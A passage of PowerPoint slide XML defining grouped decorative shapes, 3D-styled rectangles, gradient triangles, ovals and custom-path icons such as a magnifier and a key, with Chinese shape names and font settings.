                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
